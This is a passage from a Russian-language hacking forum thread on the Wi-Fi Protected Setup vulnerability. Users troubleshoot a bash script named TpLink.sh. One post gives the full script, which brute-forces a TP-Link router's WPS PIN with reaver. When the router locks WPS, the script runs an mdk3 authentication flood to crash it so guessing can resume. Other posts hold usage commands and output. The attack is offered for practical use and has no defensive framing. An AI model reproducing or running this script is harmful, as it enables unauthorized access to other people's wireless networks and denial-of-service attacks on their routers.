Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    Затёр, но тоже не помогло. Жаль, что бесполезные скрипты, не работает ни один, ни второй.
     
    #3841 Algierd, 2 Feb 2017
    Last edited: 2 Feb 2017
  2. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    320
    Likes Received:
    131
    Reputations:
    3
    Другого нет :( И проблема в том, что просто на всех (штук 5 попробовал) такое сообщение
     
    #3842 carartem02, 2 Feb 2017
    Last edited: 2 Feb 2017
  3. grek-6630

    grek-6630 New Member

    Joined:
    16 Feb 2016
    Messages:
    36
    Likes Received:
    3
    Reputations:
    0
    Добрый вечер,у меня такая проблема точка лоченая TP-Link. Поместил папку со скриптом в домашнюю папку,далее вот...
    root@kali:~# airmon-ng

    PHY Interface Driver Chipset

    phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
    phy2 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

    root@kali:~# airmon-ng start wlan1


    PHY Interface Driver Chipset

    phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
    phy2 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

    (mac80211 monitor mode vif enabled for [phy2]wlan1 on [phy2]wlan1mon)
    (mac80211 station mode vif disabled for [phy2]wlan1)

    root@kali:~# cd TpLink/
    root@kali:~/TpLink# chmod +x TpLink.sh
    root@kali:~/TpLink# ./TpLink.sh 84:16:F9:9D:07:7A wlan1mon
    ./tmp/84:16:F9:9D:07:7A
    BSSID = 84:16:F9:9D:07:7A
    [+] reaver is working ...
    [-] Failed to retrieve a MAC address for interface 'mon0'!
    [-] not associated
    [-] not associated
    [-] not associated

    и так без конца,может я что то не так сделал? Меня смущает [-] Failed to retrieve a MAC address for interface 'mon0'!
    Помогите кто чем может.
     
  4. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    320
    Likes Received:
    131
    Reputations:
    3
    Смени на wlan1mon. Если не знаешь, вот
    Code:
    #!/bin/bash
    
    BSSID=$1
    WPSPIN=""
    WPAPSK=""
    name_interface=$2
    Work_reaver=20
    tmp_path=`dirname $0`/tmp/$BSSID
    echo $tmp_path
    
    
    print_example (){
    echo "Example usage: TpLink.sh BSSID interface";
    echo "Example usage: TpLink.sh FF:FF:FF:FF:FF:FF wlan0mon";
    }
    
    
    if [ "$1" == "" ]
      then
      print_example
      exit 1
      fi
    if [ "$2" == "" ]
      then
      echo "No interface, using wlan1mon"
      name_interface="wlan1mon"
      fi
    echo "BSSID = $BSSID"
    echo "Interface = $name_interface"
    #echo "" > "$tmp_path.txt"
    
    
    
    trap 'echo "Wait exit reaver"; kill_reaver; exit 1' 2
    
    kill_reaver (){
    killall -s INT -w reaver;
    }
    
    run_MDK3 (){
    echo [+] Mdk3 is working ...
    gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 $name_interface a -a $BSSID -m"
    sleep 6
    killall mdk3 2> /dev/null
    echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]
    sleep 5
    }
    
    wait_associated (){
    Ass=""
    while [ "$Ass" == "" ]
    do
    sleep 2
    Ass=`grep "Associated with" "$tmp_path.txt"`
      if [ "$Ass" == "" ]
      then echo [-] not associated
      else echo $Ass
      fi
    done
    
    }
    
    while [ "$WPSPIN" == "" ]
    do
    echo [+] reaver is working ...
    echo "" > $tmp_path.txt
    reaver -i $name_interface -b $BSSID -n -v -L -s "$tmp_path.wpc" > "$tmp_path.txt" &
    ReaverID=$!
    disown $ReaverID  
    
    wait_associated
    
    for (( counter=1; counter<$Work_reaver; counter++ ))
       do
        sleep 2
       if [ "$WPSPIN" == "" ]
      then
        WPSPIN=`grep "WPS PIN" "$tmp_path.txt"`
        WPAPSK=`grep "WPA PSK" "$tmp_path.txt"`
       else break
       fi
       done
    
    TRYPIN=`grep "Trying pin" "$tmp_path.txt" | grep -oE "[[:digit:]]{8}"`
    
    echo "Pins"
    echo "$TRYPIN"
    
    kill_reaver
    
    # Run mdk3 to work ...
    if [ "$WPSPIN" == "" ]
    then run_MDK3
    fi
    done
    
    echo "[+] Done..."
    echo "$WPSPIN"
    echo "$WPAPSK"
    echo to interrupt script [Ctrl+C]
    while true
    do
    sleep 3
    done
    
    Запускай вот так - TpLink.sh BSSID interface
    ps добавил возможность выбора интерфейса, чтобы руками не менять каждый раз
     
    #3844 carartem02, 2 Feb 2017
    Last edited: 2 Feb 2017
    grek-6630 likes this.
  5. g-n0m_ru

    g-n0m_ru New Member

    Joined:
    18 Jan 2017
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Скрипт ReVdk не работает на Kali linux версии выше 1.0 так как airmon-ng был пере патрашен... этот скрипт работает и уже присутствует в сборках Wislax
     
  6. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    320
    Likes Received:
    131
    Reputations:
    3
    Странно, а на сайте есть версия r3 для кали 2 (знаю то,что уже 2016 есть, но всё же)
     
  7. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    Для чего вообще нужны эти скрипты если ими нельзя подключитя ни к одной залоченной точке доступа? Типа если заблокируется, nо md3 якобы снимет блокировку? Честно говоря, ещё ни разу не видел ни одного нового роутера который бы хоть как-то реагировал на эту штуку. Да и если надо руками запустить атаку не проблема ведь, смысла в этом только нет...
     
  8. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    320
    Likes Received:
    131
    Reputations:
    3
    Я 2-3 года назад спокойно дудосил свой роутер, интернет на нём пропадал. (а может даже и перезагружался)
    PS mdk3. Да и скрипта, который всё взломает тоже нет
     
  9. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    Это ещё хорошо если из 10 маршрутизаторов 1 такой попадётся. У меня из примерно 10 роутров рядом эта mdk3 вообще до лампочки.
     
  10. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    320
    Likes Received:
    131
    Reputations:
    3
    Лично у меня половина роутеров с WPS падает (pixie+3wifi) и без всяких mdk3.
     
  11. g-n0m_ru

    g-n0m_ru New Member

    Joined:
    18 Jan 2017
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Там печенька вот в чем в старой верси кали airmon-ng воспринимал mon0 в новой же кали виртуальный интерфес обозначается как wlan0mon а скрипт написан под mon0 вот и все дела ставь на виртуалку Kali linux и wislax и всего делов то ....
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Проще скрипт переписать / доработать до поддержки двух типов интерфейсов.
     
  13. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    Ну хорошо, давайте доведем до ума , у меня залип на стадии атаки mdk3 - а должен работать 6 секунд.
    Жалуется на терминал в пути Desktop/ Если возьмемся сделаем.
     
  14. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    завтра проверю на другом tp-link
     
  15. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    320
    Likes Received:
    131
    Reputations:
    3
    Зачем это всё? Он у вас спросит какой интерфейс юзать ("Which wireless interface you will be using? e.g wlan0, wlan0mon etc:"), пишите "wlan0mon" (предварительно выполнив "airmon-ng start wlan0") и будет счастье
    UPD: на 3 запуске сломался XD
     
    #3855 carartem02, 2 Feb 2017
    Last edited: 2 Feb 2017
  16. uneasy

    uneasy New Member

    Joined:
    2 Feb 2017
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Всем привет, что то я не понял в чем прикол этого скрипта ? Сегодня тестил его на Tplink, точка заблокировалась после перебора трех-пяти пинов.
     
  17. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    320
    Likes Received:
    131
    Reputations:
    3
    После блокировки он должен положить роутер, чтобы продолжить подбор
     
  18. uneasy

    uneasy New Member

    Joined:
    2 Feb 2017
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    понял, завтра буду дальше пробовать
     
  19. g-n0m_ru

    g-n0m_ru New Member

    Joined:
    18 Jan 2017
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    вы походу не поняли. скрипт ждет что будет создан виртуальный интерфейс mon0 а по факту у вас он будет называться wlan0mon.
    скрипт не поймет этого...его нужно перелопатить имено под wlan0mon... гдето в инете есть скрипт переделанный ,но найти я его второй раз не смог
     
  20. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    320
    Likes Received:
    131
    Reputations:
    3
    Может 3 версия и есть тот самый скрипт? Просто у меня он как-то запустился XD
    PS я про то,что там можно указать имя интерфейса